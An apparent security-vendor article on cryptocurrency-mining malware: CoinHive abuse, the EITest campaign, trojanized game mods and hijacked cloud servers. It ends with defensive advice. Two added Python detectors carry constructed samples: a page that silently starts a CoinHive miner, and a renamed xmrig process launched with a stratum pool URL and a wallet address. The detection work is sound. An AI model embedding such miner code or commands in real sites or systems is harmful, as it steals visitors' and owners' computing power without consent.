Cryptocurrency mining is a resource-intensive task: keeping an operation going can consume huge amounts of electricity and require powerful graphics cards, dedicated processors, and other hardware. Bitcoin is still the most valuable cryptocurrency (hitting a high of almost US$6,000 in the third week of October), but mining it profitably requires serious investment.
As this report notes, underpowered rigs spend more on electricity than they earn in Bitcoin. And as the reward for mining a block (a batch of validated transactions appended to the Bitcoin ledger) shrinks, it gets harder to make a profit. In 2016, the block reward was halved to 12.5 BTC, and it is scheduled to halve again approximately every four years. Bitcoin mining is also becoming mostly an enterprise endeavor, because profitable mining requires custom ASIC hardware.
Faced with these facts, many individuals may shift their mining ambitions to other currencies whose proof-of-work algorithms are designed to resist ASICs, so that users with ordinary CPUs and GPUs can still mine them with reasonable returns. Cybercriminals appear to be moving in the same direction: Bitcoin was previously the preferred currency of many in the underground, but current crypto-mining malware mostly targets Monero or Zcash. Monero is particularly attractive to them because it mines efficiently on commodity CPUs (that is, on any infected machine) and its transactions are private by design, which makes payouts hard to trace.
With the widespread boom in cryptocurrency value, it’s no wonder that cybercriminals are continuing to develop new methods and techniques to efficiently mine cryptocurrency.
Legitimate Advertising Alternatives
CoinHive is a legitimate JavaScript miner purposely developed as an alternative revenue stream for websites: instead of peppering a site with advertisements, the owner embeds the script and visitors' browsers mine Monero for the site while they are on the page. A popular torrent site was one of the first major sites to adopt it. However, visitors were not warned that their CPU was being used, nor told how to opt out.
In response to these concerns, CoinHive released an alternative called AuthedMine, which "enforces an explicit opt-in from the user" before the miner runs. Google is also reportedly considering a permission setting in its browser that would let users block mining on websites.
Another concern with a legitimate miner like this is its potential for abuse. Cybercriminals can inject the code into compromised websites, as happened with the Showtime website, or distribute it like typical malware. In September, Trend Micro discovered that the EITest campaign was delivering a modified CoinHive miner (detected by Trend Micro as HKTL_COINMINE) after directing users to fake tech support pages designed to compromise their devices.
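As an added illustration (not code from the original post or from CoinHive), the following Python script classifies a page's script tags the way a web-content scanner would: it looks for the silent coinhive.min.js library and the opt-in authedmine.min.js library, and checks whether an inline script actually instantiates and starts the miner. The library URLs and the `CoinHive.Anonymous(...)` / `.start()` calls reflect CoinHive's public API at the time and are assumptions of this example; the three sample pages and the site key placeholder are constructed for it.

```python
import re
from html.parser import HTMLParser

# Known in-browser miner libraries. The two entries reflect how CoinHive shipped
# its silent and opt-in builds (assumed for this example); extend for copycats.
MINER_LIBRARIES = {
    "coinhive.com/lib/coinhive.min.js": "silent",
    "authedmine.com/lib/authedmine.min.js": "opt-in",
}

# Inline script patterns: the miner object being created and then started.
MINER_CONSTRUCT = re.compile(r"new\s+CoinHive\.(Anonymous|User|Token)\s*\(")
MINER_START = re.compile(r"\.start\s*\(")


class ScriptCollector(HTMLParser):
    """Collect external <script src> URLs and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.sources = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.sources.append(src)
        else:
            self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as raw text.
        if self._in_script:
            self.inline.append(data)


def classify_page(html):
    """Return which miner library a page loads and whether it starts the miner."""
    parser = ScriptCollector()
    parser.feed(html)

    library = None
    for src in parser.sources:
        # Normalise "https://", "http://" and protocol-relative "//" prefixes.
        path = re.sub(r"^(https?:)?//", "", src.strip()).lower()
        for known, kind in MINER_LIBRARIES.items():
            if path.startswith(known):
                library = kind

    inline = "\n".join(parser.inline)
    constructs = MINER_CONSTRUCT.search(inline) is not None
    starts = constructs and MINER_START.search(inline) is not None

    if library == "silent" and starts:
        verdict = "silent miner: starts without user consent"
    elif library == "opt-in":
        verdict = "opt-in miner: the library prompts the visitor before mining"
    elif library or constructs:
        verdict = "miner code referenced but not started in an inline script"
    else:
        verdict = "no known miner"
    return {"library": library, "constructs_miner": constructs,
            "starts_miner": starts, "verdict": verdict}


# Constructed sample pages for the example (not captured from any real site).
SILENT_MINER_PAGE = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script></head><body><h1>Downloads</h1></body></html>"""

OPT_IN_PAGE = """<html><head>
<script src="//authedmine.com/lib/authedmine.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');
  miner.start();
</script></head><body><h1>Downloads</h1></body></html>"""

CLEAN_PAGE = """<html><head>
<script src="https://cdn.example/jquery.min.js"></script>
<script>document.title = 'Downloads';</script>
</head><body><h1>Downloads</h1></body></html>"""

if __name__ == "__main__":
    for name, page in [("silent", SILENT_MINER_PAGE), ("opt-in", OPT_IN_PAGE), ("clean", CLEAN_PAGE)]:
        print(name, "->", classify_page(page)["verdict"])
```

The URL list only catches the stock libraries. A modified copy hosted on the compromised site itself under another name (the kind of thing the EITest campaign delivered) will not match it, which is why the check also looks at the inline construct-and-start pattern, and why runtime signals such as a tab keeping a CPU core busy while idle still matter.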
Malware Methods and New Techniques
Cryptocurrency mining malware is distributed through the usual channels: spam mail, malicious sites, and potentially unwanted applications (PUAs). Cybercriminals also use malware to build large botnets that mine cryptocurrency. This looks inefficient, since the affected devices individually lack the capabilities to mine effectively, but the attacker pays nothing for the hardware or electricity, so every cycle the botnet contributes is profit and its scale makes up for each device's weakness.
The current landscape shows attackers experimenting with new ways to exploit users. In mid-October, a Russian developer creating mods for the popular game GTA V reportedly inserted a modified XMRig miner into his mods, mining Monero on the PCs of the people who downloaded them.
Cloud services are also being abused to mine cryptocurrency. Just this month, there were reports of unsecured cloud platforms being hijacked to mine Monero. Researchers said that these platforms were exposed with default credentials, so no exploit was needed: the attackers simply logged in, took over the unsecured resources and used the processor cycles to mine alt-coins.
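A host-side check, written for this article as an added example (not Trend Micro's or any vendor's detection logic), that scores running processes for the miner indicators described above: a known miner binary name, an XMRig-style stratum pool URL or Monero wallet address on the command line, the xmrig --donate-level flag, and an outbound connection to a typical pool port. The process list and connection table are constructed samples standing in for ps and ss/netstat output, the wallet address is a made-up string of the right shape, and the pool-port watchlist is an assumption of the example.

```python
import re

# Strong indicators score 2 points each; a pool port alone scores 1 and is not
# enough to flag a process, because legitimate services use those ports too.
MINER_BINARY_NAMES = ("xmrig", "xmr-stak", "cpuminer", "minerd", "ccminer")
STRATUM_URL = re.compile(r"stratum\+(?:tcp|ssl)://[\w.\-]+:\d+", re.IGNORECASE)
# Monero primary addresses are 95 base58 characters starting with '4'.
MONERO_ADDRESS = re.compile(r"\b4[1-9A-HJ-NP-Za-km-z]{94}\b")
DONATE_FLAG = re.compile(r"--donate-level[= ]\d+")
# Ports commonly used by Monero mining pools (assumed watchlist for this example).
POOL_PORTS = {3333, 4444, 5555, 7777, 8888, 14444}
FLAG_THRESHOLD = 2


def score_cmdline(cmdline):
    """Return (score, reasons) for one process command line."""
    reasons = []
    binary = cmdline.split()[0].rsplit("/", 1)[-1].lower()
    if any(name in binary for name in MINER_BINARY_NAMES):
        reasons.append(f"known miner binary name '{binary}'")
    if STRATUM_URL.search(cmdline):
        reasons.append("stratum pool URL on the command line")
    if MONERO_ADDRESS.search(cmdline):
        reasons.append("Monero wallet address on the command line")
    if DONATE_FLAG.search(cmdline):
        reasons.append("xmrig --donate-level flag")
    return 2 * len(reasons), reasons


def find_miners(processes, connections):
    """Score every process; return {pid: {"score", "reasons"}} for those at or over threshold."""
    findings = {}
    for pid, cmdline in processes:
        score, reasons = score_cmdline(cmdline)
        for conn_pid, remote_host, remote_port in connections:
            if conn_pid == pid and remote_port in POOL_PORTS:
                score += 1
                reasons.append(f"outbound connection to pool port {remote_host}:{remote_port}")
        if score >= FLAG_THRESHOLD:
            findings[pid] = {"score": score, "reasons": reasons}
    return findings


# Constructed sample data (stand-ins for `ps -eo pid,args` and `ss -tnp` output).
FAKE_WALLET = "4" + "7vXwq9A3rLmN2bKjHpYtD8cEfGhJ4mPsTuVwXyZaBcDeFgH" * 2  # 95 chars, made up
PROCESSES = [
    (1201, "/usr/sbin/sshd -D"),
    # Renamed binary posing as a kernel thread, but its arguments give it away.
    (2310, f"/tmp/.x/kworkerds -o stratum+tcp://pool.example:4444 -u {FAKE_WALLET} -p x -k --donate-level=1"),
    (2450, "/usr/bin/python3 /opt/app/server.py"),
    # Miner launched from a config file: no pool or wallet on the command line.
    (2770, "/home/admin/xmrig --config=/home/admin/config.json"),
]
CONNECTIONS = [
    (2310, "203.0.113.10", 4444),
    (2450, "198.51.100.7", 4444),   # benign service on a pool port: weak signal only
    (2770, "203.0.113.10", 3333),
]

if __name__ == "__main__":
    for pid, finding in find_miners(PROCESSES, CONNECTIONS).items():
        print(pid, finding["score"], "; ".join(finding["reasons"]))
```

The renamed binary (pid 2310) is caught purely by its arguments and its pool connection, while the benign process on pid 2450 stays below the threshold despite talking to port 4444. A miner that reads everything from a config file and has also been renamed leaves only the pool connection and sustained CPU load as signals, so the port list and a CPU-usage check belong together in a real sweep of a cloud fleet.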
As cryptocurrency continues to gain value and becomes more accepted by mainstream financial institutions, we can expect cybercriminals to keep finding new ways to turn users' devices into unwilling miners. As with any other malware, defend against this threat by keeping systems and software updated with the latest security patches, and always change the default passwords on enterprise and personal devices. Sustained unexplained CPU usage, a browser tab that keeps a core busy while idle, and outbound connections to mining pools are the signs to watch for.